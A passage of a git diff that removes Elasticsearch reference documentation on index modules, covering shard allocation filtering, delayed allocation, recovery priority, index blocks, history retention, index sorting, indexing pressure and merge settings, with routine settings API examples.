-[[x-pack-index-settings]] -=== [xpack]#{xpack} index settings# - -<>:: - - Specify the lifecycle policy and rollover alias for an index. --- - -include::index-modules/analysis.asciidoc[] - -include::index-modules/allocation.asciidoc[] - -include::index-modules/blocks.asciidoc[] - -include::index-modules/mapper.asciidoc[] - -include::index-modules/merge.asciidoc[] - -include::index-modules/similarity.asciidoc[] - -include::index-modules/slowlog.asciidoc[] - -include::index-modules/store.asciidoc[] - -include::index-modules/translog.asciidoc[] - -include::index-modules/history-retention.asciidoc[] - -include::index-modules/index-sorting.asciidoc[] - -include::index-modules/indexing-pressure.asciidoc[] diff --git a/docs/reference/index-modules/allocation.asciidoc b/docs/reference/index-modules/allocation.asciidoc deleted file mode 100644 index 709f66b7f35..00000000000 --- a/docs/reference/index-modules/allocation.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -[[index-modules-allocation]] -== Index Shard Allocation - -This module provides per-index settings to control the allocation of shards to -nodes: - -* <>: Controlling which shards are allocated to which nodes. -* <>: Delaying allocation of unassigned shards caused by a node leaving. -* <>: A hard limit on the number of shards from the same index per node. -* <>: Controls the allocation of indices to <>. - -include::allocation/filtering.asciidoc[] - -include::allocation/delayed.asciidoc[] - -include::allocation/prioritization.asciidoc[] - -include::allocation/total_shards.asciidoc[] - -include::allocation/data_tier_allocation.asciidoc[] diff --git a/docs/reference/index-modules/allocation/data_tier_allocation.asciidoc b/docs/reference/index-modules/allocation/data_tier_allocation.asciidoc deleted file mode 100644 index ea5aa3c5678..00000000000 --- a/docs/reference/index-modules/allocation/data_tier_allocation.asciidoc +++ /dev/null @@ -1,50 +0,0 @@ -[role="xpack"] -[[data-tier-shard-filtering]] -=== Index-level data tier allocation filtering - -You can use index-level allocation settings to control which <> -the index is allocated to. The data tier allocator is a -<> that uses two built-in -node attributes: `_tier` and `_tier_preference`. 
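Before the individual settings are listed below, here is a minimal sketch of
what an index-level tier filter might look like, assuming a hypothetical index
name; the `_tier_preference` setting used here is described in the next
section:

[source,console]
------------------------------
PUT my-index/_settings
{
  "index.routing.allocation.include._tier_preference": "data_warm,data_hot"
}
------------------------------

With this preference, the index is placed on warm nodes when any are available
and falls back to hot nodes otherwise.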
- -These tier attributes are set using the data node roles: - -* <> -* <> -* <> -* <> - -NOTE: The <> role is not a valid data tier and cannot be used -for data tier filtering. - -[discrete] -[[data-tier-allocation-filters]] -==== Data tier allocation settings - - -`index.routing.allocation.include._tier`:: - - Assign the index to a node whose `node.roles` configuration has at - least one of to the comma-separated values. - -`index.routing.allocation.require._tier`:: - - Assign the index to a node whose `node.roles` configuration has _all_ - of the comma-separated values. - -`index.routing.allocation.exclude._tier`:: - - Assign the index to a node whose `node.roles` configuration has _none_ of the - comma-separated values. - -[[tier-preference-allocation-filter]] -`index.routing.allocation.include._tier_preference`:: - - Assign the index to the first tier in the list that has an available node. - This prevents indices from remaining unallocated if no nodes are available - in the preferred tier. - For example, if you set `index.routing.allocation.include._tier_preference` - to `data_warm,data_hot`, the index is allocated to the warm tier if there - are nodes with the `data_warm` role. If there are no nodes in the warm tier, - but there are nodes with the `data_hot` role, the index is allocated to - the hot tier. diff --git a/docs/reference/index-modules/allocation/delayed.asciidoc b/docs/reference/index-modules/allocation/delayed.asciidoc deleted file mode 100644 index f49ed7e05db..00000000000 --- a/docs/reference/index-modules/allocation/delayed.asciidoc +++ /dev/null @@ -1,105 +0,0 @@ -[[delayed-allocation]] -=== Delaying allocation when a node leaves - -When a node leaves the cluster for whatever reason, intentional or otherwise, -the master reacts by: - -* Promoting a replica shard to primary to replace any primaries that were on the node. -* Allocating replica shards to replace the missing replicas (assuming there are enough nodes). -* Rebalancing shards evenly across the remaining nodes. - -These actions are intended to protect the cluster against data loss by -ensuring that every shard is fully replicated as soon as possible. - -Even though we throttle concurrent recoveries both at the -<> and at the <>, this -``shard-shuffle'' can still put a lot of extra load on the cluster which -may not be necessary if the missing node is likely to return soon. Imagine -this scenario: - -* Node 5 loses network connectivity. -* The master promotes a replica shard to primary for each primary that was on Node 5. -* The master allocates new replicas to other nodes in the cluster. -* Each new replica makes an entire copy of the primary shard across the network. -* More shards are moved to different nodes to rebalance the cluster. -* Node 5 returns after a few minutes. -* The master rebalances the cluster by allocating shards to Node 5. - -If the master had just waited for a few minutes, then the missing shards could -have been re-allocated to Node 5 with the minimum of network traffic. This -process would be even quicker for idle shards (shards not receiving indexing -requests) which have been automatically <>. - -The allocation of replica shards which become unassigned because a node has -left can be delayed with the `index.unassigned.node_left.delayed_timeout` -dynamic setting, which defaults to `1m`. 
- -This setting can be updated on a live index (or on all indices): - -[source,console] ------------------------------- -PUT _all/_settings -{ - "settings": { - "index.unassigned.node_left.delayed_timeout": "5m" - } -} ------------------------------- -// TEST[s/^/PUT test\n/] - -With delayed allocation enabled, the above scenario changes to look like this: - -* Node 5 loses network connectivity. -* The master promotes a replica shard to primary for each primary that was on Node 5. -* The master logs a message that allocation of unassigned shards has been delayed, and for how long. -* The cluster remains yellow because there are unassigned replica shards. -* Node 5 returns after a few minutes, before the `timeout` expires. -* The missing replicas are re-allocated to Node 5 (and sync-flushed shards recover almost immediately). - -NOTE: This setting will not affect the promotion of replicas to primaries, nor -will it affect the assignment of replicas that have not been assigned -previously. In particular, delayed allocation does not come into effect after a full cluster restart. -Also, in case of a master failover situation, elapsed delay time is forgotten -(i.e. reset to the full initial delay). - -==== Cancellation of shard relocation - -If delayed allocation times out, the master assigns the missing shards to -another node which will start recovery. If the missing node rejoins the -cluster, and its shards still have the same sync-id as the primary, shard -relocation will be cancelled and the synced shard will be used for recovery -instead. - -For this reason, the default `timeout` is set to just one minute: even if shard -relocation begins, cancelling recovery in favour of the synced shard is cheap. - -==== Monitoring delayed unassigned shards - -The number of shards whose allocation has been delayed by this timeout setting -can be viewed with the <>: - -[source,console] ------------------------------- -GET _cluster/health <1> ------------------------------- - -<1> This request will return a `delayed_unassigned_shards` value. - -==== Removing a node permanently - -If a node is not going to return and you would like Elasticsearch to allocate -the missing shards immediately, just update the timeout to zero: - - -[source,console] ------------------------------- -PUT _all/_settings -{ - "settings": { - "index.unassigned.node_left.delayed_timeout": "0" - } -} ------------------------------- -// TEST[s/^/PUT test\n/] - -You can reset the timeout as soon as the missing shards have started to recover. diff --git a/docs/reference/index-modules/allocation/filtering.asciidoc b/docs/reference/index-modules/allocation/filtering.asciidoc deleted file mode 100644 index 6b481fb9a51..00000000000 --- a/docs/reference/index-modules/allocation/filtering.asciidoc +++ /dev/null @@ -1,128 +0,0 @@ -[[shard-allocation-filtering]] -=== Index-level shard allocation filtering - -You can use shard allocation filters to control where {es} allocates shards of -a particular index. These per-index filters are applied in conjunction with -<> and -<>. - -Shard allocation filters can be based on custom node attributes or the built-in -`_name`, `_host_ip`, `_publish_ip`, `_ip`, `_host`, `_id`, `_tier` and `_tier_preference` -attributes. <> uses filters based -on custom node attributes to determine how to reallocate shards when moving -between phases. - -The `cluster.routing.allocation` settings are dynamic, enabling live indices to -be moved from one set of nodes to another. 
Shards are only relocated if it is -possible to do so without breaking another routing constraint, such as never -allocating a primary and replica shard on the same node. - -For example, you could use a custom node attribute to indicate a node's -performance characteristics and use shard allocation filtering to route shards -for a particular index to the most appropriate class of hardware. - -[discrete] -[[index-allocation-filters]] -==== Enabling index-level shard allocation filtering - -To filter based on a custom node attribute: - -. Specify the filter characteristics with a custom node attribute in each -node's `elasticsearch.yml` configuration file. For example, if you have `small`, -`medium`, and `big` nodes, you could add a `size` attribute to filter based -on node size. -+ -[source,yaml] --------------------------------------------------------- -node.attr.size: medium --------------------------------------------------------- -+ -You can also set custom attributes when you start a node: -+ -[source,sh] --------------------------------------------------------- -`./bin/elasticsearch -Enode.attr.size=medium --------------------------------------------------------- - -. Add a routing allocation filter to the index. The `index.routing.allocation` -settings support three types of filters: `include`, `exclude`, and `require`. -For example, to tell {es} to allocate shards from the `test` index to either -`big` or `medium` nodes, use `index.routing.allocation.include`: -+ --- -[source,console] ------------------------- -PUT test/_settings -{ - "index.routing.allocation.include.size": "big,medium" -} ------------------------- -// TEST[s/^/PUT test\n/] - -If you specify multiple filters the following conditions must be satisfied -simultaneously by a node in order for shards to be relocated to it: - -* If any `require` type conditions are specified, all of them must be satisfied -* If any `exclude` type conditions are specified, none of them may be satisfied -* If any `include` type conditions are specified, at least one of them must be -satisfied - -For example, to move the `test` index to `big` nodes in `rack1`, you could -specify: - -[source,console] ------------------------- -PUT test/_settings -{ - "index.routing.allocation.require.size": "big", - "index.routing.allocation.require.rack": "rack1" -} ------------------------- -// TEST[s/^/PUT test\n/] --- - -[discrete] -[[index-allocation-settings]] -==== Index allocation filter settings - -`index.routing.allocation.include.{attribute}`:: - - Assign the index to a node whose `{attribute}` has at least one of the - comma-separated values. - -`index.routing.allocation.require.{attribute}`:: - - Assign the index to a node whose `{attribute}` has _all_ of the - comma-separated values. - -`index.routing.allocation.exclude.{attribute}`:: - - Assign the index to a node whose `{attribute}` has _none_ of the - comma-separated values. - -The index allocation settings support the following built-in attributes: - -[horizontal] -`_name`:: Match nodes by node name -`_host_ip`:: Match nodes by host IP address (IP associated with hostname) -`_publish_ip`:: Match nodes by publish IP address -`_ip`:: Match either `_host_ip` or `_publish_ip` -`_host`:: Match nodes by hostname -`_id`:: Match nodes by node id -`_tier`:: Match nodes by the node's <> role. - For more details see <> - -NOTE: `_tier` filtering is based on <> roles. Only -a subset of roles are <> roles, and the generic -<> will match any tier filtering. 
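-
-For instance, to keep shards of the `test` index off one particular node, you
-could exclude it by node name (the node name `node-1` below is only a
-placeholder):
-
-[source,console]
-------------------------
-PUT test/_settings
-{
-  "index.routing.allocation.exclude._name": "node-1"
-}
-------------------------
-// TEST[s/^/PUT test\n/]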
- -You can use wildcards when specifying attribute values, for example: - -[source,console] ------------------------- -PUT test/_settings -{ - "index.routing.allocation.include._ip": "192.168.2.*" -} ------------------------- -// TEST[skip:indexes don't assign] diff --git a/docs/reference/index-modules/allocation/prioritization.asciidoc b/docs/reference/index-modules/allocation/prioritization.asciidoc deleted file mode 100644 index 5a864b657ba..00000000000 --- a/docs/reference/index-modules/allocation/prioritization.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[[recovery-prioritization]] -=== Index recovery prioritization - -Unallocated shards are recovered in order of priority, whenever possible. -Indices are sorted into priority order as follows: - -* the optional `index.priority` setting (higher before lower) -* the index creation date (higher before lower) -* the index name (higher before lower) - -This means that, by default, newer indices will be recovered before older indices. - -Use the per-index dynamically updatable `index.priority` setting to customise -the index prioritization order. For instance: - -[source,console] ------------------------------- -PUT index_1 - -PUT index_2 - -PUT index_3 -{ - "settings": { - "index.priority": 10 - } -} - -PUT index_4 -{ - "settings": { - "index.priority": 5 - } -} ------------------------------- - -In the above example: - -* `index_3` will be recovered first because it has the highest `index.priority`. -* `index_4` will be recovered next because it has the next highest priority. -* `index_2` will be recovered next because it was created more recently. -* `index_1` will be recovered last. - -This setting accepts an integer, and can be updated on a live index with the -<>: - -[source,console] ------------------------------- -PUT index_4/_settings -{ - "index.priority": 1 -} ------------------------------- -// TEST[continued] diff --git a/docs/reference/index-modules/allocation/total_shards.asciidoc b/docs/reference/index-modules/allocation/total_shards.asciidoc deleted file mode 100644 index 265ef79564d..00000000000 --- a/docs/reference/index-modules/allocation/total_shards.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[[allocation-total-shards]] -=== Total shards per node - -The cluster-level shard allocator tries to spread the shards of a single index -across as many nodes as possible. However, depending on how many shards and -indices you have, and how big they are, it may not always be possible to spread -shards evenly. - -The following _dynamic_ setting allows you to specify a hard limit on the total -number of shards from a single index allowed per node: - -[[total-shards-per-node]] -`index.routing.allocation.total_shards_per_node`:: - - The maximum number of shards (replicas and primaries) that will be - allocated to a single node. Defaults to unbounded. - -You can also limit the amount of shards a node can have regardless of the index: - -[[cluster-total-shards-per-node]] -`cluster.routing.allocation.total_shards_per_node`:: -+ --- -(<>) -Maximum number of primary and replica shards allocated to each node. Defaults to -`-1` (unlimited). - -{es} checks this setting during shard allocation. For example, a cluster has a -`cluster.routing.allocation.total_shards_per_node` setting of `100` and three -nodes with the following shard allocations: - -- Node A: 100 shards -- Node B: 98 shards -- Node C: 1 shard - -If node C fails, {es} reallocates its shard to node B. Reallocating the shard to -node A would exceed node A's shard limit. 
--- - -[WARNING] -======================================= -These settings impose a hard limit which can result in some shards not being -allocated. - -Use with caution. -======================================= diff --git a/docs/reference/index-modules/analysis.asciidoc b/docs/reference/index-modules/analysis.asciidoc deleted file mode 100644 index 709e5be5706..00000000000 --- a/docs/reference/index-modules/analysis.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -[[index-modules-analysis]] -== Analysis - -The index analysis module acts as a configurable registry of _analyzers_ -that can be used in order to convert a string field into individual terms -which are: - -* added to the inverted index in order to make the document searchable -* used by high level queries such as the <> - to generate search terms. - -See <> for configuration details. diff --git a/docs/reference/index-modules/blocks.asciidoc b/docs/reference/index-modules/blocks.asciidoc deleted file mode 100644 index 8431dc80492..00000000000 --- a/docs/reference/index-modules/blocks.asciidoc +++ /dev/null @@ -1,141 +0,0 @@ -[[index-modules-blocks]] -== Index blocks - -Index blocks limit the kind of operations that are available on a certain -index. The blocks come in different flavours, allowing to block write, -read, or metadata operations. The blocks can be set / removed using dynamic -index settings, or can be added using a dedicated API, which also ensures -for write blocks that, once successfully returning to the user, all shards -of the index are properly accounting for the block, for example that all -in-flight writes to an index have been completed after adding the write -block. - -[discrete] -[[index-block-settings]] -=== Index block settings - -The following _dynamic_ index settings determine the blocks present on an -index: - -[[index-blocks-read-only]] -`index.blocks.read_only`:: - - Set to `true` to make the index and index metadata read only, `false` to - allow writes and metadata changes. - -`index.blocks.read_only_allow_delete`:: - - Similar to `index.blocks.read_only`, but also allows deleting the index to - make more resources available. The <> may add and remove this block automatically. -+ -Deleting documents from an index to release resources - rather than deleting the index itself - can increase the index size over time. When `index.blocks.read_only_allow_delete` is set to `true`, deleting documents is not permitted. However, deleting the index itself releases the read-only index block and makes resources available almost immediately. -+ -IMPORTANT: {es} adds and removes the read-only index block automatically when the disk utilization falls below the high watermark, controlled by <>. - -`index.blocks.read`:: - - Set to `true` to disable read operations against the index. - -`index.blocks.write`:: - - Set to `true` to disable data write operations against the index. Unlike `read_only`, - this setting does not affect metadata. For instance, you can close an index with a `write` - block, but you cannot close an index with a `read_only` block. - -`index.blocks.metadata`:: - - Set to `true` to disable index metadata reads and writes. - -[discrete] -[[add-index-block]] -=== Add index block API - -Adds an index block to an index. 
- -[source,console] --------------------------------------------------- -PUT /my-index-000001/_block/write --------------------------------------------------- -// TEST[setup:my_index] - - -[discrete] -[[add-index-block-api-request]] -==== {api-request-title} - -`PUT //_block/` - - -[discrete] -[role="child_attributes"] -[[add-index-block-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] -+ -To add blocks to all indices, use `_all` or `*`. To disallow the adding -of blocks to indices with `_all` or wildcard expressions, -change the `action.destructive_requires_name` cluster setting to `true`. -You can update this setting in the `elasticsearch.yml` file -or using the <> API. -``:: -(Required, string) -Block type to add to the index. -+ -.Valid values for `` -[%collapsible%open] -==== -`metadata`:: -Disable metadata changes, such as closing the index. - -`read`:: -Disable read operations. - -`read_only`:: -Disable write operations and metadata changes. - -`write`:: -Disable write operations. However, metadata changes are still allowed. -==== -[discrete] -[[add-index-block-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[discrete] -[[add-index-block-api-example]] -==== {api-examples-title} - -The following example shows how to add an index block: - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_block/write --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n/] - -The API returns following response: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true, - "shards_acknowledged" : true, - "indices" : [ { - "name" : "my-index-000001", - "blocked" : true - } ] -} --------------------------------------------------- diff --git a/docs/reference/index-modules/history-retention.asciidoc b/docs/reference/index-modules/history-retention.asciidoc deleted file mode 100644 index eac0abb5a0f..00000000000 --- a/docs/reference/index-modules/history-retention.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ -[[index-modules-history-retention]] -== History retention - -{es} sometimes needs to replay some of the operations that were performed on a -shard. For instance, if a replica is briefly offline then it may be much more -efficient to replay the few operations it missed while it was offline than to -rebuild it from scratch. Similarly, {ccr} works by performing operations on the -leader cluster and then replaying those operations on the follower cluster. - -At the Lucene level there are really only two write operations that {es} -performs on an index: a new document may be indexed, or an existing document may -be deleted. Updates are implemented by atomically deleting the old document and -then indexing the new document. A document indexed into Lucene already contains -all the information needed to replay that indexing operation, but this is not -true of document deletions. To solve this, {es} uses a feature called _soft -deletes_ to preserve recent deletions in the Lucene index so that they can be -replayed. 
- -{es} only preserves certain recently-deleted documents in the index because a -soft-deleted document still takes up some space. Eventually {es} will fully -discard these soft-deleted documents to free up that space so that the index -does not grow larger and larger over time. Fortunately {es} does not need to be -able to replay every operation that has ever been performed on a shard, because -it is always possible to make a full copy of a shard on a remote node. However, -copying the whole shard may take much longer than replaying a few missing -operations, so {es} tries to retain all of the operations it expects to need to -replay in future. - -{es} keeps track of the operations it expects to need to replay in future using -a mechanism called _shard history retention leases_. Each shard copy that might -need operations to be replayed must first create a shard history retention lease -for itself. For example, this shard copy might be a replica of a shard or it -might be a shard of a follower index when using {ccr}. Each retention lease -keeps track of the sequence number of the first operation that the corresponding -shard copy has not received. As the shard copy receives new operations, it -increases the sequence number contained in its retention lease to indicate that -it will not need to replay those operations in future. {es} discards -soft-deleted operations once they are not being held by any retention lease. - -If a shard copy fails then it stops updating its shard history retention lease, -which means that {es} will preserve all new operations so they can be replayed -when the failed shard copy recovers. However, retention leases only last for a -limited amount of time. If the shard copy does not recover quickly enough then -its retention lease may expire. This protects {es} from retaining history -forever if a shard copy fails permanently, because once a retention lease has -expired {es} can start to discard history again. If a shard copy recovers after -its retention lease has expired then {es} will fall back to copying the whole -index since it can no longer simply replay the missing history. The expiry time -of a retention lease defaults to `12h` which should be long enough for most -reasonable recovery scenarios. - -Soft deletes are enabled by default on indices created in recent versions, but -they can be explicitly enabled or disabled at index creation time. If soft -deletes are disabled then peer recoveries can still sometimes take place by -copying just the missing operations from the translog -<>. {ccr-cap} will not function if soft deletes are disabled. - -[discrete] -=== History retention settings - -include::{es-ref-dir}/index-modules.asciidoc[tag=ccr-index-soft-deletes-tag] - -include::{es-ref-dir}/index-modules.asciidoc[tag=ccr-index-soft-deletes-retention-tag] diff --git a/docs/reference/index-modules/index-sorting.asciidoc b/docs/reference/index-modules/index-sorting.asciidoc deleted file mode 100644 index e32684c8264..00000000000 --- a/docs/reference/index-modules/index-sorting.asciidoc +++ /dev/null @@ -1,214 +0,0 @@ -[[index-modules-index-sorting]] -== Index Sorting - -When creating a new index in Elasticsearch it is possible to configure how the Segments -inside each Shard will be sorted. By default Lucene does not apply any sort. -The `index.sort.*` settings define which fields should be used to sort the documents inside each Segment. 
- -[WARNING] -nested fields are not compatible with index sorting because they rely on the assumption -that nested documents are stored in contiguous doc ids, which can be broken by index sorting. -An error will be thrown if index sorting is activated on an index that contains nested fields. - -For instance the following example shows how to define a sort on a single field: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "index": { - "sort.field": "date", <1> - "sort.order": "desc" <2> - } - }, - "mappings": { - "properties": { - "date": { - "type": "date" - } - } - } -} --------------------------------------------------- - -<1> This index is sorted by the `date` field -<2> ... in descending order. - -It is also possible to sort the index by more than one field: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "index": { - "sort.field": [ "username", "date" ], <1> - "sort.order": [ "asc", "desc" ] <2> - } - }, - "mappings": { - "properties": { - "username": { - "type": "keyword", - "doc_values": true - }, - "date": { - "type": "date" - } - } - } -} --------------------------------------------------- - -<1> This index is sorted by `username` first then by `date` -<2> ... in ascending order for the `username` field and in descending order for the `date` field. - - -Index sorting supports the following settings: - -`index.sort.field`:: - - The list of fields used to sort the index. - Only `boolean`, `numeric`, `date` and `keyword` fields with `doc_values` are allowed here. - -`index.sort.order`:: - - The sort order to use for each field. - The order option can have the following values: - * `asc`: For ascending order - * `desc`: For descending order. - -`index.sort.mode`:: - - Elasticsearch supports sorting by multi-valued fields. - The mode option controls what value is picked to sort the document. - The mode option can have the following values: - * `min`: Pick the lowest value. - * `max`: Pick the highest value. - -`index.sort.missing`:: - - The missing parameter specifies how docs which are missing the field should be treated. - The missing value can have the following values: - * `_last`: Documents without value for the field are sorted last. - * `_first`: Documents without value for the field are sorted first. - -[WARNING] -Index sorting can be defined only once at index creation. It is not allowed to add or update -a sort on an existing index. Index sorting also has a cost in terms of indexing throughput since -documents must be sorted at flush and merge time. You should test the impact on your application -before activating this feature. - -[discrete] -[[early-terminate]] -=== Early termination of search request - -By default in Elasticsearch a search request must visit every document that match a query to -retrieve the top documents sorted by a specified sort. -Though when the index sort and the search sort are the same it is possible to limit -the number of documents that should be visited per segment to retrieve the N top ranked documents globally. 
-For example, let's say we have an index that contains events sorted by a timestamp field: - -[source,console] --------------------------------------------------- -PUT events -{ - "settings": { - "index": { - "sort.field": "timestamp", - "sort.order": "desc" <1> - } - }, - "mappings": { - "properties": { - "timestamp": { - "type": "date" - } - } - } -} --------------------------------------------------- - -<1> This index is sorted by timestamp in descending order (most recent first) - -You can search for the last 10 events with: - -[source,console] --------------------------------------------------- -GET /events/_search -{ - "size": 10, - "sort": [ - { "timestamp": "desc" } - ] -} --------------------------------------------------- -// TEST[continued] - -Elasticsearch will detect that the top docs of each segment are already sorted in the index -and will only compare the first N documents per segment. -The rest of the documents matching the query are collected to count the total number of results -and to build aggregations. - -If you're only looking for the last 10 events and have no interest in -the total number of documents that match the query you can set `track_total_hits` -to false: - -[source,console] --------------------------------------------------- -GET /events/_search -{ - "size": 10, - "sort": [ <1> - { "timestamp": "desc" } - ], - "track_total_hits": false -} --------------------------------------------------- -// TEST[continued] - -<1> The index sort will be used to rank the top documents and each segment will early terminate the collection after the first 10 matches. - -This time, Elasticsearch will not try to count the number of documents and will be able to terminate the query -as soon as N documents have been collected per segment. - -[source,console-result] --------------------------------------------------- -{ - "_shards": ... - "hits" : { <1> - "max_score" : null, - "hits" : [] - }, - "took": 20, - "timed_out": false -} --------------------------------------------------- -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": "$body._shards",/] -// TESTRESPONSE[s/"took": 20,/"took": "$body.took",/] - -<1> The total number of hits matching the query is unknown because of early termination. - -NOTE: Aggregations will collect all documents that match the query regardless -of the value of `track_total_hits` - -[[index-modules-index-sorting-conjunctions]] -=== Use index sorting to speed up conjunctions - -Index sorting can be useful in order to organize Lucene doc ids (not to be -conflated with `_id`) in a way that makes conjunctions (a AND b AND ...) more -efficient. In order to be efficient, conjunctions rely on the fact that if any -clause does not match, then the entire conjunction does not match. By using -index sorting, we can put documents that do not match together, which will -help skip efficiently over large ranges of doc IDs that do not match the -conjunction. - -This trick only works with low-cardinality fields. A rule of thumb is that -you should sort first on fields that both have a low cardinality and are -frequently used for filtering. The sort order (`asc` or `desc`) does not -matter as we only care about putting values that would match the same clauses -close to each other. - -For instance if you were indexing cars for sale, it might be interesting to -sort by fuel type, body type, make, year of registration and finally mileage. 
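-
-A minimal sketch of such an index follows; the index and field names are
-purely illustrative and not taken from an existing example:
-
-[source,console]
---------------------------------------------------
-PUT cars
-{
-  "settings": {
-    "index": {
-      "sort.field": [ "fuel_type", "body_type", "make", "registration_year", "mileage" ],
-      "sort.order": [ "asc", "asc", "asc", "desc", "asc" ]
-    }
-  },
-  "mappings": {
-    "properties": {
-      "fuel_type":         { "type": "keyword" },
-      "body_type":         { "type": "keyword" },
-      "make":              { "type": "keyword" },
-      "registration_year": { "type": "integer" },
-      "mileage":           { "type": "integer" }
-    }
-  }
-}
---------------------------------------------------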
diff --git a/docs/reference/index-modules/indexing-pressure.asciidoc b/docs/reference/index-modules/indexing-pressure.asciidoc deleted file mode 100644 index a91cfc04c21..00000000000 --- a/docs/reference/index-modules/indexing-pressure.asciidoc +++ /dev/null @@ -1,73 +0,0 @@ -[[index-modules-indexing-pressure]] -== Indexing pressure - -Indexing documents into {es} introduces system load in the form of memory and -CPU load. Each indexing operation includes coordinating, primary, and replica -stages. These stages can be performed across multiple nodes in a cluster. - -Indexing pressure can build up through external operations, such as indexing -requests, or internal mechanisms, such as recoveries and {ccr}. If too much -indexing work is introduced into the system, the cluster can become saturated. -This can adversely impact other operations, such as search, cluster -coordination, and background processing. - -To prevent these issues, {es} internally monitors indexing load. When the load -exceeds certain limits, new indexing work is rejected - -[discrete] -[[indexing-stages]] -=== Indexing stages - -External indexing operations go through three stages: coordinating, primary, and -replica. See <>. - -[discrete] -[[memory-limits]] -=== Memory limits - -The `indexing_pressure.memory.limit` node setting restricts the number of bytes -available for outstanding indexing requests. This setting defaults to 10% of -the heap. - -At the beginning of each indexing stage, {es} accounts for the -bytes consumed by an indexing request. This accounting is only released at the -end of the indexing stage. This means that upstream stages will account for the -request overheard until all downstream stages are complete. For example, the -coordinating request will remain accounted for until primary and replica -stages are complete. The primary request will remain accounted for until each -in-sync replica has responded to enable replica retries if necessary. - -A node will start rejecting new indexing work at the coordinating or primary -stage when the number of outstanding coordinating, primary, and replica indexing -bytes exceeds the configured limit. - -A node will start rejecting new indexing work at the replica stage when the -number of outstanding replica indexing bytes exceeds 1.5x the configured limit. -This design means that as indexing pressure builds on nodes, they will naturally -stop accepting coordinating and primary work in favor of outstanding replica -work. - -The `indexing_pressure.memory.limit` setting's 10% default limit is generously -sized. You should only change it after careful consideration. Only indexing -requests contribute to this limit. This means there is additional indexing -overhead (buffers, listeners, etc) which also require heap space. Other -components of {es} also require memory. Setting this limit too high can deny -operating memory to other operations and components. - -[discrete] -[[indexing-pressure-monitoring]] -=== Monitoring - -You can use the -<> to -retrieve indexing pressure metrics. - -[discrete] -[[indexing-pressure-settings]] -=== Indexing pressure settings - -`indexing_pressure.memory.limit` {ess-icon}:: - Number of outstanding bytes that may be consumed by indexing requests. When - this limit is reached or exceeded, the node will reject new coordinating and - primary operations. When replica operations consume 1.5x this limit, the node - will reject new replica operations. Defaults to 10% of the heap. 
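-
-If you do decide to change the limit after careful consideration, it is a node
-setting configured in `elasticsearch.yml`; the value below is purely
-illustrative:
-
-[source,yaml]
---------------------------------------------------
-indexing_pressure.memory.limit: 15%
---------------------------------------------------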
diff --git a/docs/reference/index-modules/mapper.asciidoc b/docs/reference/index-modules/mapper.asciidoc deleted file mode 100644 index 484aec18466..00000000000 --- a/docs/reference/index-modules/mapper.asciidoc +++ /dev/null @@ -1,8 +0,0 @@ -[[index-modules-mapper]] -== Mapper - -The mapper module acts as a registry for the type mapping definitions -added to an index either when creating it or by using the put mapping -api. It also handles the dynamic mapping support for types that have no -explicit mappings pre defined. For more information about mapping -definitions, check out the <>. diff --git a/docs/reference/index-modules/merge.asciidoc b/docs/reference/index-modules/merge.asciidoc deleted file mode 100644 index 3a262b0678e..00000000000 --- a/docs/reference/index-modules/merge.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -[[index-modules-merge]] -== Merge - -A shard in Elasticsearch is a Lucene index, and a Lucene index is broken down -into segments. Segments are internal storage elements in the index where the -index data is stored, and are immutable. Smaller segments are periodically -merged into larger segments to keep the index size at bay and to expunge -deletes. - -The merge process uses auto-throttling to balance the use of hardware -resources between merging and other activities like search. - -[discrete] -[[merge-scheduling]] -=== Merge scheduling - -The merge scheduler (ConcurrentMergeScheduler) controls the execution of merge -operations when they are needed. Merges run in separate threads, and when the -maximum number of threads is reached, further merges will wait until a merge -thread becomes available. - -The merge scheduler supports the following _dynamic_ setting: - -`index.merge.scheduler.max_thread_count`:: - - The maximum number of threads on a single shard that may be merging at once. - Defaults to - `Math.max(1, Math.min(4, <> / 2))` which - works well for a good solid-state-disk (SSD). If your index is on spinning - platter drives instead, decrease this to 1. - diff --git a/docs/reference/index-modules/similarity.asciidoc b/docs/reference/index-modules/similarity.asciidoc deleted file mode 100644 index 98569d8e7fc..00000000000 --- a/docs/reference/index-modules/similarity.asciidoc +++ /dev/null @@ -1,558 +0,0 @@ -[[index-modules-similarity]] -== Similarity module - -A similarity (scoring / ranking model) defines how matching documents -are scored. Similarity is per field, meaning that via the mapping one -can define a different similarity per field. - -Configuring a custom similarity is considered an expert feature and the -builtin similarities are most likely sufficient as is described in -<>. - -[discrete] -[[configuration]] -=== Configuring a similarity - -Most existing or custom Similarities have configuration options which -can be configured via the index settings as shown below. The index -options can be provided when creating an index or updating index -settings. 
